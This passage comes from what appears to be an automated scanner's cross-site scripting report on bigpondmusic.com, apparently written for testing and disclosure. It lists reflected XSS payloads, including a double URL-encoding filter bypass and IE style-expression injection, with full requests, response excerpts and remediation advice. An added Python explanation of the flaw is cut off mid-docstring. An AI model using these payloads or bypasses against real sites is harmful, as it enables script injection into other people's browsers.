Content-Type: text/html; charset=utf-8
Content-Length: 88016


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/favourites90474"><script>alert(1)</script>963876f3728" />
...[SNIP]...

2.320. http://bigpondmusic.com/mixtapes/favourites [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/favourites

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d0f8"style%3d"x%3aexpression(alert(1))"dafd2609343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d0f8"style="x:expression(alert(1))"dafd2609343 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /mixtapes/favourites?3d0f8"style%3d"x%3aexpression(alert(1))"dafd2609343=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 66663


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Login - BigPond Music MP3 Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/favourites?3d0f8"style="x:expression(alert(1))"dafd2609343=1" />
...[SNIP]...

2.321. http://bigpondmusic.com/mixtapes/my [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/my

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14be3'%3be9b05043c37 was submitted in the REST URL parameter 1. This input was echoed as 14be3';e9b05043c37 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes14be3'%3be9b05043c37/my HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87718


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes14be3';e9b05043c37';
   s.prop4 = 'my';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'N
...[SNIP]...

2.322. http://bigpondmusic.com/mixtapes/my [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/my

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81532%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e581cc6a8032 was submitted in the REST URL parameter 1. This input was echoed as 81532"><script>alert(1)</script>581cc6a8032 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mixtapes81532%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e581cc6a8032/my HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87967


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes81532"><script>alert(1)</script>581cc6a8032/my" />
...[SNIP]...

2.323. http://bigpondmusic.com/mixtapes/my [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/my

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a6c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e815e4c85f12 was submitted in the REST URL parameter 2. This input was echoed as 68a6c"><script>alert(1)</script>815e4c85f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mixtapes/my68a6c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e815e4c85f12 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88544


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/my68a6c"><script>alert(1)</script>815e4c85f12" />
...[SNIP]...

2.324. http://bigpondmusic.com/mixtapes/my [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/my

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a68c8'%3bd1c6965a88e was submitted in the REST URL parameter 2. This input was echoed as a68c8';d1c6965a88e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes/mya68c8'%3bd1c6965a88e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87812


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
st,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes';
   s.prop4 = 'mya68c8';d1c6965a88e';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.325. http://bigpondmusic.com/mixtapes/my [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/my

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3950b"style%3d"x%3aexpression(alert(1))"924e74bd953 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3950b"style="x:expression(alert(1))"924e74bd953 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /mixtapes/my?3950b"style%3d"x%3aexpression(alert(1))"924e74bd953=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 66639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Login - BigPond Music MP3 Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/my?3950b"style="x:expression(alert(1))"924e74bd953=1" />
...[SNIP]...

2.326. http://bigpondmusic.com/my/password [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /my/password

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3f14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4088cadae99 was submitted in the REST URL parameter 1. This input was echoed as a3f14"><script>alert(1)</script>4088cadae99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mya3f14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4088cadae99/password HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87965


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mya3f14"><script>alert(1)</script>4088cadae99/password" />
...[SNIP]...

2.327. http://bigpondmusic.com/my/password [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /my/password

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a5e7'%3b84668ae8af1 was submitted in the REST URL parameter 1. This input was echoed as 2a5e7';84668ae8af1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my2a5e7'%3b84668ae8af1/password HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
elstrabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'my2a5e7';84668ae8af1';
   s.prop4 = 'password';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop1
...[SNIP]...

2.328. http://bigpondmusic.com/my/password [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /my/password

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28047%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18810252797 was submitted in the REST URL parameter 2. This input was echoed as 28047"><script>alert(1)</script>18810252797 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /my/password28047%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18810252797 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88326


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/my/password28047"><script>alert(1)</script>18810252797" />
...[SNIP]...

2.329. http://bigpondmusic.com/my/password [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /my/password

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1bd0'%3b5a7abd16f6b was submitted in the REST URL parameter 2. This input was echoed as f1bd0';5a7abd16f6b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my/passwordf1bd0'%3b5a7abd16f6b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87997


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
st,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'my';
   s.prop4 = 'passwordf1bd0';5a7abd16f6b';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.330. http://bigpondmusic.com/my/password [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /my/password

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f4e7"style%3d"x%3aexpression(alert(1))"ca05f3d7abb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f4e7"style="x:expression(alert(1))"ca05f3d7abb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /my/password?1f4e7"style%3d"x%3aexpression(alert(1))"ca05f3d7abb=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 80255


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Forgot Password - BigPond Mu
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/my/password?1f4e7"style="x:expression(alert(1))"ca05f3d7abb=1" />
...[SNIP]...

2.331. http://bigpondmusic.com/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c095b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e0bb0bd59 was submitted in the REST URL parameter 1. This input was echoed as c095b"><script>alert(1)</script>57e0bb0bd59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
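The double-decode bypass and the unencoded parentUrl reflection recur across entries 2.320, 2.322, 2.323, 2.325, 2.326, 2.328, 2.330 and 2.331 above, so one worked model serves all of them. The Python below is an added example, not code from this report or from bigpondmusic.com. It assumes a hypothetical blacklist on '<', '>' and '"' applied to the path after the web server's single URL-decode (the real filter is not visible in the report), reproduces the second decode and raw concatenation that the scanner's responses imply, and puts the fix beside it: decode once, never re-decode, and HTML-attribute-encode at the point of output. The request targets are copied from the entries above; the parser check shows what a browser-style tokenizer makes of each response.

```python
"""Constructed model of the parentUrl reflection seen in the entries above.

Assumptions that are NOT from the report: the blacklist rejects '<', '>' and
'"' in the path only, after the web server's single decode, and the
application URL-decodes the path a second time before rebuilding the URL.
The model only reproduces the two behaviours the scanner observed: a
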